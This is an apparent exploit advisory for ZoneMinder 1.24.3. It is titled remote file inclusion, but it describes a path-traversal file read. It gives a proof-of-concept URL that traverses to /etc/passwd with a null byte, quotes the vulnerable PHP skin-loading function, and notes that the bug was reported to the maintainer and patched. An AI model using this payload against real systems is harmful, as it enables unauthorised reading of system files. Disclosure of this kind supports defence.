# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability
# Author: Iye (iye[dot]cba-at-gmail[dot]com)
# Software Link: http://www.zoneminder.com/
# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested
# Tested on: Ubuntu 10.04
You must be authenticated as a user in the Web App to exploit it. It's
not a must to be admin.
POC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00
Reported to proyect mantainer (Philip Coombes) on 2011-07-22
Fix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt
Vulnerable Code:
function getSkinFile( $file )
global $skinBase;
$skinFile = false;
foreach ( $skinBase as $skin )
$tempSkinFile = 'skins'.'/'.$skin.'/'.$file;
if ( file_exists( $tempSkinFile ) )
$skinFile = $tempSkinFile;
return( $skinFile );